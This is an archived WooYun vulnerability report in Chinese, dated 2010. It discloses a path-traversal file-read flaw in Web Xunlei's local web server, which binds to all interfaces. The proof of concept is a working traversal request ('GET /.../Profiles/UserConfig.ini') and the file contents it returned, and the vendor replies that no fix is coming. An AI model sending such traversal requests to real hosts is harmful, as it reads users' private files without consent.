web迅雷远程任意文件读取漏洞

漏洞概要

缺陷编号: WooYun-2010-00868

漏洞标题: web迅雷远程任意文件读取漏洞

相关厂商: 迅雷

漏洞作者: 路人甲

提交时间: 2010-11-23

公开时间: 2010-12-23

漏洞类型: 设计错误

危害等级: 中

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org


漏洞详情

简要描述:

web迅雷在设计上和实现上存在问题,导致恶意攻击者可以读取安装有web迅雷的用户机器上的任意文件

详细说明:

web迅雷在本机存在有一webserver,并且绑定在0.0.0.0上,同时对于web请求处理并不恰当,存在安全缺陷导致恶意攻击者可以构造请求读取用户机器上的任意文件。
对于../跳目录的情况有处理,但是对于…/却可以绕过(某大师牛逼的分析思路,用file mon黑盒分析,赞!)

漏洞证明:

 

GET /.../Profiles/UserConfig.ini HTTP/1.1



HTTP/1.0 200 OK

Server: Xunlei Http Server/1.0

Date: Tue, 23 Nov 2010 09:02:07 GMT

Content-type: *

Content-length: 407

Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT



[Skin]

CurrSkin=default.rar

SkinNames=default.rar

[Monitor]

ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.w

ma;.wmp;.wmv;.zip;.torrent;

FilterSitesMax=20

[EMuleGenericSettings]

EMuleWatchLink=1

[Update]

RunUpdate=0

[General]

TaskShowPerPage=11

[Antivirus]

Protect=0

FilePath=

Parameter=

[BHOSection]

StatsDay=2

[SavePath]

SetFolderIcon=1

Path=C:\Xunlei\

发送 43, r接受 579: 无sock



C:\Documents and Settings\Administrator>

 

修复方案:

恩哼


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2010-11-23

厂商回复:

某大牛很早之前就联系过我们关于这个漏洞。但由于该项目很久就没有再维护更新了,所以没有修复。还是非常感谢。

发表评论?

0 条评论。

发表评论